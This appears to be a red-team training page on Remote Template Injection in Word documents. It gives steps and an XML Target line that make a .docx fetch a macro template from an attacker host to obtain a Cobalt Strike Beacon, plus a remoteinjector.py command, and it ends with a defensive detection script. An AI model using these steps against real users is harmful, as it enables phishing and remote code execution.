Remote Template Injection

Microsoft Word can create new documents from a template. Office ships with some templates pre-installed, and you can also make custom templates or download new ones. Remote Template Injection is a technique where an attacker sends a victim a benign-looking document which, when opened, downloads and loads a malicious template. This template may hold a macro, leading to code execution.

Open Word on the Attacker Desktop, create a new blank document and insert your desired macro. Save this to C:\Payloads as a Word 97-2003 Template (*.dot) file. This is now our "malicious remote template". Use Cobalt Strike to host this file at http://nickelviper.com/template.dot.

Next, create a new document from the blank template located in C:\Users\Attacker\Documents\Custom Office Templates. Add any content you want, then save it to C:\Payloads as a new .docx. Browse to the directory in Explorer, right-click and select 7-Zip > Open archive. Navigate to word > _rels, right-click on settings.xml.rels and select Edit.

This is just a small XML file. Scroll right until you see the Target entry.

Target="file:///C:\Users\Attacker\Documents\Custom%20Office%20Templates\Blank%20Template.dotx"

It's currently pointing to the template on our local disk from which the document was created. Simply modify this so it points to the template URL instead.

Target="http://nickelviper.com/template.dot"

Save those changes and email the document to Bob. Once the file is opened, you'll see a warning about macros again, but allowing them to run will execute the macro in the hosted template, giving us a Beacon.

John Woodman created a Python tool that can automate this process so that we don't have to modify the XML manually.

ubuntu@DESKTOP-3BSK7NO ~> python3 remoteinjector.py -w http://nickelviper.com/template.dot /mnt/c/Payloads/document.docx
URL Injected and saved to /mnt/c/Payloads/document_new.docx
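
From the defender's side, the edit described above leaves a recognizable artifact: an attachedTemplate relationship in word/_rels/settings.xml.rels whose Target is a network location instead of a local path. The Python check below is an added example, not part of the original page or of remoteinjector.py; the function names and the UNC sample path are assumptions made for illustration, and the sample documents are constructed in memory.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

RELS_PATH = "word/_rels/settings.xml.rels"
REL_TAG = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"
REMOTE_SCHEMES = {"http", "https", "ftp"}
# Both Target values below are the ones shown on this page.
LOCAL = r"file:///C:\Users\Attacker\Documents\Custom%20Office%20Templates\Blank%20Template.dotx"
REMOTE = "http://nickelviper.com/template.dot"


def is_remote(target):
    """True when a relationship Target resolves over the network, not local disk."""
    parsed = urlparse(target)
    scheme = parsed.scheme.lower()
    if scheme in REMOTE_SCHEMES:
        return True
    if scheme == "file" and parsed.netloc:  # file://server/share/...
        return True
    return target.startswith("\\\\")  # UNC path


def find_remote_templates(docx_bytes):
    """Return the Target of each attachedTemplate relationship that is remote."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PATH not in zf.namelist():
            return []  # no settings relationships, so no attached template
        # stdlib parser for brevity; prefer defusedxml on untrusted mail attachments
        root = ET.fromstring(zf.read(RELS_PATH))
    return [rel.get("Target", "") for rel in root.iter(REL_TAG)
            if rel.get("Type", "").endswith("/attachedTemplate")
            and is_remote(rel.get("Target", ""))]


def build_sample(target):
    """Constructed sample: a ZIP holding only the relationships part."""
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/'
            f'2006/relationships/attachedTemplate" Target="{target}" TargetMode="External"/>'
            '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(RELS_PATH, rels)
    return buf.getvalue()


if __name__ == "__main__":
    for target in (LOCAL, REMOTE, r"\\fileserver\share\t.dotm"):  # last one is constructed
        print(target, "->", find_remote_templates(build_sample(target)))
```

A mail gateway or triage script can call find_remote_templates on each inbound .docx and quarantine any file for which the returned list is not empty.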